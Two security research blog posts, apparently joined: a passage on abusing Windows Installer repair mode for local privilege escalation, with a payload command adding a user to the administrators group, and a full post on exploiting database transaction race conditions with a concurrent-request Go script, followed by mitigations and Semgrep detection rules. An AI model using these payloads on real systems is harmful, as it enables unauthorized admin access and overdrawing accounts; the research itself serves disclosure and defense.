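For illustration, a minimal Go sketch of what such a test.exe payload might look like. The lowpriv user name comes from the walkthrough above, and net.exe is the Windows built-in; here we only construct and print the command rather than execute it:

```go
package main

import (
	"fmt"
	"strings"
)

// payloadCmd returns the command an "add-me-as-admin" style payload
// would run once executing as LocalSystem.
func payloadCmd() (string, []string) {
	return "net", []string{"localgroup", "administrators", "lowpriv", "/add"}
}

func main() {
	name, args := payloadCmd()
	// A real test.exe would run exec.Command(name, args...).Run();
	// printed here for illustration only.
	fmt.Println(name, strings.Join(args, " "))
}
```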

Event details

Optionally, add /L*V log.txt to the repair command for a detailed log. The poisoned properties should be evident:

MSI (s) (98:B4) [02:01:33:733]: Machine policy value 'AlwaysInstallElevated' is 0
MSI (s) (98:B4) [02:01:33:733]: User policy value 'AlwaysInstallElevated' is 0
...
Action start 2:01:33: InstallInitialize.
MSI (s) (98:B4) [02:01:33:739]: Doing action: SetRunCommand
MSI (s) (98:B4) [02:01:33:739]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: InstallInitialize. Return value 1.
MSI (s) (98:B4) [02:01:33:740]: PROPERTY CHANGE: Adding RunCommand property. Its value is '"C:\Users\lowpriv\test.exe"'.
Action start 2:01:33: SetRunCommand.
MSI (s) (98:B4) [02:01:33:740]: Doing action: RunCommand
MSI (s) (98:B4) [02:01:33:740]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: SetRunCommand. Return value 1.

The Poisoned Variables

The repair operation in msiexec.exe can be initiated by a standard user, while automatically elevating its privileges to execute certain actions, including various custom actions defined in the MSI file. Notably, not all custom actions execute with elevated privileges. Specifically, to run elevated, an action must be explicitly marked as Impersonate="no", be scheduled between the InstallInitialize and InstallFinalize events, and use either commit, rollback or deferred as the execution type.

In the future, we may publish additional materials, including a toolset to hunt for affected installers that satisfy the above criteria.

Elevated custom actions may use environment variables as well as Windows Installer properties (see the full list of properties). I’ve observed the following properties can be “poisoned” by a standard user that invokes the repair process:

  • “AdminToolsFolder”
  • “AppDataFolder”
  • “DesktopFolder”
  • “FavoritesFolder”
  • “LocalAppDataFolder”
  • “MyPicturesFolder”
  • “NetHoodFolder”
  • “PersonalFolder”
  • “PrintHoodFolder”
  • “ProgramMenuFolder”
  • “RecentFolder”
  • “SendToFolder”
  • “StartMenuFolder”
  • “StartupFolder”
  • “TempFolder”
  • “TemplateFolder”

Additionally, the following environment variables are often used by software installers (this list is not exhaustive):

  • “APPDATA”
  • “HomePath”
  • “LOCALAPPDATA”
  • “TEMP”
  • “TMP” (Meanwhile, a separate patch introduced the SystemTemp concept and remediated these two variables. Thanks to @pfiatde for pointing it out!)
  • “USERPROFILE”

These values are typically utilized to construct custom paths or as system command parameters. Poisoned values can alter the command’s intent, potentially leading to a command injection vulnerability.

Note that the described issue is not exploitable on its own. The MSI file utilizing a vulnerable Custom Action must be already installed on the machine. However, the issue could be handy to pentesters performing Local Privilege Elevation or as a persistence mechanism.

Disclosure Timeline

The details of this issue were reported to the Microsoft Security Response Center on December 1, 2023. The bug was confirmed on the latest Windows Insider Preview build at the time of the reporting: 26002.1000.rs_prerelease.231118-1559.

12/01/2023: The vulnerability reported to Microsoft
02/09/2024: Additional details requested
02/09/2024: Additional details provided
05/09/2024: Issue closed as non-reproducible: “We completed the assessment and because we weren’t able to reproduce the issue with the repro steps provide _[sic]_. We don’t expect any further action on the case and we will proceed with closing out the case.”

We asked Microsoft to reopen the ticket, and the blog post draft was shared with Microsoft prior to publication.

As of now, the issue is still not fixed. We confirmed that it is affecting the current latest Windows Insider Preview build 10.0.25120.751.


A Race to the Bottom - Database Transactions Undermining Your AppSec

Introduction

Databases are a crucial part of any modern application. Like any external dependency, they introduce additional complexity for the developers building an application. In the real world, however, they are usually considered and used as a black box which provides storage functionality.

This post aims to shed light on a particular aspect of the complexity databases introduce, one which is often overlooked by developers: concurrency control. The best way to do that is to start off by looking at a fairly common code pattern we at Doyensec see in our day-to-day work:

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()

  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  // (1)
  tx, err := conn.BeginTx(ctx)

  var user User
  // (2)
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&user.Id, &user.Name, &user.Balance)

  // (3)
  if amount <= 0 || amount > user.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // (4)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance - $2 WHERE id = $1", source, amount)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance + $2 WHERE id = $1", destination, amount)

  // (5)
  err = tx.Commit(ctx)
  return nil
}

Note: All error checking has been removed for clarity.

For the readers not familiar with Go, here’s a short summary of what the code is doing. We can assume that the application will initially perform authentication and authorization on the incoming HTTP request. When all required checks have passed, the db.Transfer function handling the database logic will be called. At this point the application will:

  1. Establish a new database transaction

  2. Read the source account’s balance

  3. Verify that the transfer amount is valid with regard to the source account’s balance and the application’s business rules

  4. Update the source and destination accounts’ balances appropriately

  5. Commit the database transaction

A transfer can be made by making a request to the /transfer endpoint, like so:

POST /transfer HTTP/1.1
Host: localhost:9009
Content-Type: application/json
Content-Length: 31

{
    "source":1,
    "destination":2,
    "amount":50
}

We specify the source and destination account IDs, and the amount to be transferred between them. The full source code, and other sample apps developed for this research can be found in our playground repo.

Before continuing reading, take a minute and review the code to see if you can spot any issues.

Notice anything? At first look, the implementation seems correct. Sufficient input validation, bounds and balance checks are performed, no possibility of SQL injection, etc. We can also verify this by running the application and making a few requests. We’ll see that transfers are being accepted until the source account’s balance reaches zero, at which point the application will start returning errors for all subsequent requests.

Fair enough. Now, let’s try some more dynamic testing. Using the following Go script, let us make 10 concurrent requests to the /transfer endpoint. We’d expect two requests to be accepted (two transfers of 50 against an initial balance of 100) and the rest to be rejected.

func transfer() {
	client := &http.Client{}

	body := transferReq{
		From:   1,
		To:     2,
		Amount: 50,
	}
	bodyBuffer := new(bytes.Buffer)
	json.NewEncoder(bodyBuffer).Encode(body)

	req, err := http.NewRequest("POST", "http://localhost:9009/transfer", bodyBuffer)
	if err != nil {
		panic(err)
	}
	req.Header.Add("Content-Type", `application/json`)
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	} else if _, err := io.Copy(os.Stdout, resp.Body); err != nil {
		panic(err)
	}
	fmt.Printf(" / status code => %v\n", resp.StatusCode)
}

func main() {
	for i := 0; i < 10; i++ {
		// run transfer as a goroutine
		go transfer()
	}
	time.Sleep(time.Second * 2)
	fmt.Printf("done.\n")
}

However, running the script we see something different: almost all, if not all, of the requests were accepted and successfully processed by the application server. Viewing the balances of both accounts with the /dump endpoint will show that the source account has a negative balance.

We have managed to overdraw our account, effectively making money out of thin air! At this point, any person would be asking “why?” and “how?”. To answer them, we first need to take a detour and talk about databases.

Database Transactions and Isolation Levels

Transactions are a way to define a logical unit of work within a database context. Transactions consist of multiple database operations which need to be successfully executed, for the unit to be considered complete. Any failure would result in the transaction being reverted, at which point the developer needs to decide whether to accept the failure or retry the operation. Transactions are a way to ensure ACID properties for database operations. While all properties are important to ensure data correctness and safety, for this post we’re only interested in the “I” or Isolation.

In short, Isolation defines the level to which concurrent transactions will be isolated from each other. This ensures they always operate on correct data and don’t leave the database in an inconsistent state. Isolation is a property which is directly controllable by developers. The ANSI SQL-92 standard defines four isolation levels, which we will take a look at in more detail later on, but first we need to understand why we need them.

Why Do We Need Isolation?

The isolation levels are introduced to eliminate read phenomena, or unexpected behaviors, which can be observed when concurrent transactions are performed on the same set of data. The best way to understand them is with a short example, graciously borrowed from Wikipedia.

Dirty Reads

Dirty reads allow transactions to read uncommitted changes made by concurrent transactions.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
BEGIN;
UPDATE users SET age = 21 WHERE id = 1;
-- tx1
SELECT age FROM users WHERE id = 1; -- age = 21 
-- tx2
ROLLBACK; -- the second read by tx1 is reverted

Non-Repeatable Reads

Non-repeatable reads allow sequential SELECT operations to return different results as a result of concurrent transactions modifying the same table entry.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
UPDATE users SET age = 21 WHERE id = 1;
COMMIT;
-- tx1
SELECT age FROM users WHERE id = 1; -- age = 21

Phantom Reads

Phantom reads allow sequential SELECT operations on a set of entries to return different results due to modifications done by concurrent transactions.

-- tx1
BEGIN;
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob]
-- tx2
BEGIN;
INSERT INTO users VALUES (3, 'Eve', 26);
COMMIT;
-- tx1
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob, Eve]

In addition to the phenomena defined in the standard, behaviors such as “Read Skews”, “Write Skews” and “Lost Updates” can be observed in the real world.

Lost Updates

Lost updates occur when concurrent transactions perform an update on the same entry.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1;
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1;
UPDATE users SET name = 'alice' WHERE id = 1;
COMMIT; -- name set to 'alice'
-- tx1
UPDATE users SET name = 'bob' WHERE id = 1;
COMMIT; -- name set to 'bob'

This execution flow results in the change performed by tx2 being overwritten by tx1.

Read and write skews usually arise when the operations are performed on two or more entries that have a foreign-key relationship. The examples below assume that the database contains two tables: a users table which stores information about a particular user, and a change_log table which stores information about the user who performed the latest change of the target user’s name column:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL, 
  name TEXT NOT NULL
);

CREATE TABLE change_logs(
  id INT PRIMARY KEY NOT NULL, 
  updated_by VARCHAR NOT NULL, 
  user_id INT NOT NULL,
  CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users(id)
);

Read Skews

If we assume that we have the following sequence of execution:

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns 'old_name'
-- tx2
BEGIN;
UPDATE users SET name = 'new_name' WHERE id = 1;
UPDATE change_logs SET updated_by = 'Bob' WHERE user_id = 1;
COMMIT;
-- tx1
SELECT * FROM change_logs WHERE user_id = 1; -- return Bob

the view of the tx1 transaction is that the user Bob performed the last change on the user with ID 1, setting their name to old_name.

Write Skews

In the sequence of operations shown below, tx1 will perform its update under the assumption that the user’s name is Alice and there were no prior changes on the name.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns Alice
SELECT * FROM change_logs WHERE user_id = 1; -- returns an empty set
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1; 
UPDATE users SET name = 'Bob' WHERE id = 1; -- new name set
COMMIT;
-- tx1
UPDATE users SET name = 'Eve' WHERE id = 1; -- new name set
COMMIT;

However, tx2 performed its changes before tx1 was able to complete. This results in tx1 performing an update based on state which was changed during its execution.


Isolation levels are designed to guard against zero or more of these read phenomena. Let’s look at them in more detail.

Read Uncommitted

Read Uncommitted (RU) is the lowest isolation level provided. At this level, all phenomena discussed above can be observed, including reading uncommitted data, as the name suggests. While transactions using this isolation level can result in higher throughput in highly concurrent environments, it does mean that concurrent transactions will likely operate with inconsistent data. From a security standpoint, this is not a desirable property of any business-critical operation.

Thankfully, this is not the default in any database engine, and it needs to be explicitly set by developers when creating a new transaction.

Read Committed

Read Committed (RC) builds on top of the previous level’s guarantee and completely prevents dirty reads. However, it does allow other transactions to modify, insert, or delete data between individual operations of the running transaction, which can result in non-repeatable and phantom reads.

Read Committed is the default isolation level in most database engines. MySQL is an outlier here, defaulting to Repeatable Read.

Repeatable Read

In similar fashion, Repeatable Read (RR) improves on the previous isolation level by adding a guarantee that non-repeatable reads will also be prevented. The transaction will only see data which was committed before the transaction started. Phantom reads can still be observed at this level.

Serializable

Finally, we have the Serializable (S) isolation level. The highest level is designed to prevent all read phenomena. The result of concurrently executing multiple transactions with Serializable isolation will be equivalent to them being executed in serial order.

Data Races and Race Conditions

Now that we have that covered, let’s circle back to the original example. If we assume that the example was using Postgres and we’re not explicitly setting the isolation level, we’ll be using the Postgres default: Read Committed. This setting will protect us from dirty reads, and phantom or non-repeatable reads are not a concern, since we’re not performing multiple reads within the transaction.

The main reason why our example is vulnerable boils down to concurrent transaction execution and insufficient concurrency control. We can enable database logging to easily see what is being executed on the database level when our example application is being exploited.

Pulling the logs for our example, we can see something similar to:

 1. [TX1] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
 2. [TX2] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
 3. [TX1] LOG:  SELECT id, name, balance FROM users WHERE id = 2
 4. [TX2] LOG:  SELECT id, name, balance FROM users WHERE id = 2
 5. [TX1] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
 6. [TX2] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
 7. [TX1] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
 8. [TX1] LOG:  COMMIT
 9. [TX2] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
10. [TX2] LOG:  COMMIT

What we initially notice is that the operations of a single transaction are not executed as a single unit. Instead, the operations of the two transactions are interleaved, contradicting the transaction definition given earlier (i.e., a single unit of execution). This interleaving occurs as a result of transactions being executed concurrently.

Concurrent Transaction Execution

Databases are designed to execute their incoming workload concurrently. This results in increased throughput and ultimately a more performant system. While implementation details can vary between different database vendors, at a high level concurrent execution is implemented using “workers”. Databases define a set of workers whose job is to execute all transactions assigned to them by a component usually named the “scheduler”. The workers are independent of each other and can be conceptually thought of as application threads. Like application threads, they are subject to context switching, meaning that they can be interrupted mid-execution, allowing other workers to perform their work. As a result, we can end up with partial transaction execution, producing the interleaved operations we saw in the log output above. As with multithreaded application code, without proper concurrency control, we run the risk of encountering data races and race conditions.

Going back to the database logs, we can also see that both transactions are trying to perform an update on the same entry, one after the other (lines #5 and #6). Such concurrent modification will be prevented by the database by setting a lock on the modified entry, protecting the change until the transaction that made it completes or fails. Database vendors are free to implement any number of different lock types, but most of them can be simplified to two types: shared and exclusive locks.

Shared (or read) locks are acquired on table entries read from the database. They are not mutually exclusive, meaning multiple transactions can hold a shared lock on the same entry.

Exclusive (or write) locks, as the name suggests, are exclusive. They are acquired when a write/update operation is performed, and only one lock of this type can be active per table entry. This helps prevent concurrent changes to the same entry.
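As a loose application-level analogy (not how databases implement locking internally), the two lock types behave like Go’s sync.RWMutex: RLock() resembles a shared lock, Lock() an exclusive one. Holding the exclusive lock across a whole read-modify-write is what prevents the lost update phenomenon described earlier:

```go
package main

import (
	"fmt"
	"sync"
)

type account struct {
	mu      sync.RWMutex
	balance int
}

func (a *account) deposit(amount int) {
	a.mu.Lock() // exclusive: no other reader or writer may proceed
	defer a.mu.Unlock()
	a.balance += amount // the read-modify-write is one unit
}

func (a *account) read() int {
	a.mu.RLock() // shared: concurrent reads are fine
	defer a.mu.RUnlock()
	return a.balance
}

// run performs `workers` concurrent deposits of 1 and returns the
// final balance.
func run(workers int) int {
	acc := &account{}
	var wg sync.WaitGroup
	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() { defer wg.Done(); acc.deposit(1) }()
	}
	wg.Wait()
	return acc.read()
}

func main() {
	fmt.Println(run(100)) // always 100: no update is lost
}
```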

Database vendors provide a simple way to query the active locks at any point during a transaction’s execution, given that you can pause it or are executing it manually. In Postgres, for example, the following query will show the active locks:

SELECT locktype, relation::regclass, mode, transactionid AS tid, virtualtransaction AS vtid, pid, granted, waitstart FROM pg_catalog.pg_locks l LEFT JOIN pg_catalog.pg_database db ON db.oid = l.database WHERE (db.datname = '<db_name>' OR db.datname IS NULL) AND NOT pid = pg_backend_pid() ORDER BY pid;

A similar query can be used for MySQL:

SELECT thread_id, lock_data, lock_type, lock_mode, lock_status FROM performance_schema.data_locks WHERE object_name = '<db_name>';

For other database vendors refer to the appropriate documentation.

Root Cause

The isolation level used in our example (Read Committed) will not place any locks when data is being read from the database. This means that only the write operations will be placing locks on the modified entries. If we visualize this, our issue becomes clear:

Transaction's Critical Section

The lack of locking on the SELECT operation allows for concurrent access to a shared resource. This introduces a TOCTOU (time-of-check, time-of-use) issue, leading to an exploitable race condition. Even though the issue is not visible in the application code itself, it becomes obvious in the database logs.
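The TOCTOU window can be reproduced without a database at all. In this sketch, a barrier forces every goroutine to finish its balance check before any of them writes, standing in for the interleaving the database logs show happening naturally under concurrent load:

```go
package main

import (
	"fmt"
	"sync"
)

// simulate runs 10 concurrent withdrawals of 50 against a balance of
// 100. Every withdrawal performs its check first; the `checked` barrier
// ensures all checks complete before any write, so every check passes
// against the initial balance.
func simulate() int {
	balance := 100
	const withdrawals, amount = 10, 50

	var mu sync.Mutex
	var checked, done sync.WaitGroup
	checked.Add(withdrawals)
	done.Add(withdrawals)

	for i := 0; i < withdrawals; i++ {
		go func() {
			defer done.Done()

			mu.Lock()
			ok := balance >= amount // time of check
			mu.Unlock()

			checked.Done()
			checked.Wait() // every check completes before any write

			if ok {
				mu.Lock()
				balance -= amount // time of use: the check is now stale
				mu.Unlock()
			}
		}()
	}
	done.Wait()
	return balance
}

func main() {
	fmt.Println(simulate()) // 100 - 10*50 = -400: overdrawn
}
```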

Applying Theory in Practice

Different code patterns can allow for different exploit scenarios. For our particular example, the main difference will be how the new application state is calculated, or more specifically, which values are used in the calculation.

Pattern #1 - Calculations Using Current Database State

In the original example, we can see that the new balance calculations will happen on the database server. This is due to how the UPDATE operation is structured. It contains a simple addition/subtraction operation, which will be calculated by the database using the current value of the balance column at the time of execution. Putting it all together, we end up with the execution flow shown in the graph below.

Vulnerable Pattern #1

Using the database’s default isolation level, the SELECT operation will be executed before any locks are created and the same entry will be returned to the application code. The transaction whose UPDATE executes first will enter the critical section and be allowed to execute its remaining operations and commit. During that time, all other transactions will hang, waiting for the lock to be released. By committing its changes, the first transaction changes the state of the database, effectively breaking the assumption under which the waiting transactions were initiated. When the second transaction executes its UPDATEs, the calculations will be performed on the updated values, leaving the application in an incorrect state.

Pattern #2 - Calculations Using Stale Values

Working with stale values happens when the application code reads the current state of the database entry, performs the required calculations at the application layer and uses the newly calculated value in an UPDATE operation. We can perform a simple refactoring to our initial example and move the “new value” calculation to the application layer.

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()
  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  tx, err := conn.BeginTx(ctx)

  var userSrc User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&userSrc.Id, &userSrc.Name, &userSrc.Balance)

  var userDest User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", destination).
    Scan(&userDest.Id, &userDest.Name, &userDest.Balance)

  if amount <= 0 || amount > userSrc.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // note: balance calculations moved to the application layer
  newSrcBalance := userSrc.Balance - amount
  newDestBalance := userDest.Balance + amount

  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", source, newSrcBalance)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", destination, newDestBalance)

  err = tx.Commit(ctx)
  return nil
}

If two or more concurrent requests call the db.Transfer function at the same time, there is a high probability that the initial SELECTs will execute before any locks are created. All function calls will read the same values from the database, the amount verification will pass, and the new balances will be calculated. Let’s see how this scenario affects our database state if we run the previous test case:

Vulnerable Pattern #2

At first glance, the database state doesn’t show any inconsistencies. That is because both transactions performed their amount calculation based on the same state and both executed UPDATE operations with the same amounts. Even though the database state was not corrupted, it’s worth bearing in mind that we were able to execute the transaction more times than the business logic should allow. For example, an application built using a microservice architecture might implement business logic such as:

Vulnerable Pattern #2 - Microservice Application

If Service T assumes that all incoming requests from the main application are valid, and does not perform any additional validation itself, it will happily process any incoming requests. The race condition described before allows us to exploit such behavior and call the downstream Service T multiple times, effectively performing more transfers than the business requirements would allow.

This pattern can also be (ab)used to corrupt the database state. Namely, we can perform multiple transfers from the source account to different destination accounts.

Vulnerable Pattern #2.1

With this exploit, both concurrent transactions will initially see a source balance of 100, which will pass the amount verification.

Exploitation in the Real World

If you run the sample application locally, with a database running on the same machine, you will likely see that most, if not all, of the requests made to the /transfer endpoint will be accepted by the application server. The low latency between the client, application server and database server allows all requests to hit the race window and successfully commit. However, real-world application deployments are much more complex, running in cloud environments, deployed using Kubernetes clusters, placed behind reverse proxies and protected by firewalls.

We were curious to see how difficult it is to hit the race window in a real-world context. To test this, we set up a simple application deployed in an AWS Fargate container, alongside another container running the selected database.

Testing was focused on three databases: Postgres, MySQL and MariaDB.

The application logic was implemented using two programming languages: Go and Node. These languages were chosen to allow us to see how their different concurrency models (Go’s goroutines vs. Node’s event loop) impact exploitability.

Finally, we specified three techniques of attacking the application:

  1. simple multi-threaded loop

  2. last-byte sync for HTTP/1.1

  3. single packet attacks for HTTP/2.0

All of these were performed using Burp Suite: “Intruder” for (1) and the “Turbo Intruder” extension for (2) and (3).

Using this setup, we attacked the application by performing 20 requests using 10 threads/connections, transferring an amount of 50 from Bob (account ID 2 with a starting balance of 200) to Alice. Once the attack was done, we noted the number of accepted requests. Given a non-vulnerable application, there shouldn’t be more than 4 accepted requests.

This was performed 10 times for each combination of application/database/attack method, and the number of successfully processed requests was noted. From those numbers we conclude whether a specific isolation level is exploitable or not. Those results can be found here.

Results and Observations

Our testing showed that if this pattern is present in an application, it is very likely that it can be exploited. In all cases, except for the Serializable level, we were able to exceed the expected number of accepted requests, overdrawing the account. The number of accepted requests varies between different technologies, but the fact that we were able to exceed it (and in some cases, to a significant degree) is sufficient to demonstrate the exploitability of the issue.

If an attacker is able to get a large number of requests to the server in the same instant, effectively recreating the conditions of local access, the number of accepted requests jumps up significantly. So, to maximize the chance of hitting the race window, testers should prefer methods such as last-byte sync or the single packet attack.

One outlier is Postgres’ Repeatable Read level. The reason it’s not vulnerable is that it implements an isolation level called Snapshot Isolation. The guarantees provided by this isolation level sit between Repeatable Read and Serializable, ultimately providing sufficient protection and mitigating the race conditions for our example.

The languages’ concurrency models did not have any notable impact on the exploitability of the race condition.

Mitigation

On a conceptual level, the fix only requires the start of the critical section to be moved to the beginning of the transaction. This will ensure that the transaction which first reads the entry gets exclusive access to it and is the only one allowed to commit. All others will wait for its completion.

Mitigation can be implemented in a number of ways. Some of them require manual work, while others come out of the box, provided by the database of choice. Let’s start by looking at the simplest and generally preferred way: setting the transaction isolation level to Serializable.

As mentioned before, the isolation level is a user/developer controlled property of a database transaction. It can be set by simply specifying it when creating a transaction:

BEGIN TRANSACTION ISOLATION LEVEL SERIALIZABLE;

This may slightly vary from database to database, so it’s always best to consult the appropriate documentation. Usually ORMs or database drivers provide an application level interface for setting the desired isolation level. Postgres’ Go driver pgx allows users to do the following:

tx, err := conn.BeginTx(ctx, pgx.TxOptions{IsoLevel: pgx.Serializable})

It is worth noting that Serializable, being the highest isolation level, may have an impact on the performance of your application. However, its use can be limited to only the business-critical transactions. All other transactions can remain unchanged and be executed with the database’s default isolation level, or any level appropriate for that particular operation.

One alternative to this method is implementing pessimistic locking via manual locking. The idea behind this method is that the business-critical transaction will obtain all required locks at the beginning and only release them when the transaction completes or fails. This ensures that no other concurrently executing transaction will be able to interfere. Manual locking can be performed by specifying the FOR SHARE or FOR UPDATE options on your SELECT operations:

SELECT id, name, balance FROM users WHERE id = 1 FOR UPDATE
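Applied to the transfer example, the reordered transaction might look like the following sketch (assuming a users table similar to the one used throughout this post, and a transfer of 50 from account 1 to account 2):

```sql
BEGIN;
-- Acquire an exclusive lock on the source row before any validation
SELECT balance FROM users WHERE id = 1 FOR UPDATE;
-- Amount verification and balance calculation happen here, while any
-- concurrent transaction blocks on the lock above
UPDATE users SET balance = balance - 50 WHERE id = 1;
UPDATE users SET balance = balance + 50 WHERE id = 2;
COMMIT;
```

Because the locking read is the first statement, a concurrent transfer cannot read the source balance until the first transaction commits or rolls back.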

This will instruct the database to place a shared or exclusive lock, respectively, on all entries returned by the read operation, effectively disallowing any modification to them until the lock is released. This method can, however, be error-prone. There is always a possibility that some operations may get overlooked, or that new ones will be added without the FOR SHARE / FOR UPDATE option, potentially re-introducing the data race. Additionally, scenarios such as the one shown below may be possible at lower isolation levels.

Lost Update

The graph shows a scenario where ‘tx2’ performs validation on a value which becomes stale after tx1 commits, and ends up overwriting the update performed by tx1, leading to a Lost Update.

Finally, mitigation can also be implemented using optimistic locking. The conceptual opposite of pessimistic locking, optimistic locking expects that nothing will go wrong and only performs conflict detection at the end of the transaction. If a conflict is detected (i.e., the underlying data was modified by a concurrent transaction), the transaction will fail and will need to be retried. This method is usually implemented using a logical clock, or a table column, whose value must not change during the execution of the transaction.

The simplest way to implement this is by introducing a version column in your table:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,
  name TEXT NOT NULL,
  balance INT NOT NULL,
  version INT NOT NULL DEFAULT 1
);

The value of the version column must then always be verified when performing any write/update operations to the database, and incremented on every successful update. If the value has changed in the meantime, the operation will affect no rows, failing the entire transaction.

UPDATE users SET balance = 100, version = version + 1 WHERE id = 1 AND version = <last_seen_version>

Detection

If the application uses an ORM, setting the isolation level usually entails calling a setter function or supplying it as a function parameter. On the other hand, if the application constructs database transactions using raw SQL statements, the isolation level will be supplied as part of the transaction’s BEGIN statement.

Both of those methods represent a pattern which can be searched for using tools such as Semgrep. So, if we assume that our application is built using Go and uses pgx to access data stored in a Postgres database, we can use the following Semgrep rules to detect instances of unspecified isolation levels.

1. Raw SQL Transaction

rules:
  - id: pgx-sql-tx-missing-isolation-level
    message: "SQL transaction without isolation level"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.Exec($CTX, $BEGIN)
      - metavariable-regex:
          metavariable: $BEGIN
          regex: ("begin transaction"|"BEGIN TRANSACTION")

2. Missing pgx Transaction Creation Options

rules:
  - id: pgx-tx-missing-options
    message: "Postgres transaction options not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX)

3. Missing Isolation Level in pgx Transaction Creation Options

rules:
  - id: pgx-tx-missing-options-isolation
    message: "Postgres transaction isolation level not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX, $OPTS)
      - metavariable-pattern:
          metavariable: $OPTS
          patterns:
            - pattern-not: >
                $PGX.TxOptions{..., IsoLevel:$LVL, ...}

All these patterns can be easily modified to suit your tech stack and database of choice.

It’s important to note that rules like these are not a complete solution. Integrating them blindly into an existing pipeline will result in a lot of noise. We would rather recommend using them to build an inventory of all the transactions the application performs, and using that information as a starting point to review the application and apply hardening where required.

Closing Thoughts

To finish up, we should emphasize that this is not a bug in database engines. This is part of how isolation levels were designed and implemented and it is clearly described in both the SQL specification and dedicated documentation for each database. Transactions and isolation levels were designed to protect concurrent operations from interfering with each other. Mitigations against data races and race conditions, however, are not their primary use case. Unfortunately, we found that this is a common misconception.

While the usage of transactions will help guard the application from data corruption under normal circumstances, it is not sufficient to mitigate data races. When this insecure pattern is introduced in business-critical code (account management functionality, financial transactions, discount code application, etc.), the likelihood of it being exploitable is high. For that reason, review your application’s business-critical operations and verify that they perform proper data locking.

Resources

This research was presented by Viktor Chuchurski (@viktorot) at the 2024 OWASP Global AppSec conference in Lisbon. The recording of that presentation can be found here and the presentation slides can be downloaded here.

Playground code can be found on Doyensec’s GitHub.

More information

If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

Appendix - Testing Results

The table below shows which isolation levels allowed the race condition to happen for the databases we tested as part of our research (RU = Read Uncommitted, RC = Read Committed, RR = Repeatable Read, S = Serializable; Y = exploitable, N = not exploitable).

           RU   RC   RR   S
MySQL      Y    Y    Y    N
Postgres   Y    Y    N    N
MariaDB    Y    Y    Y    N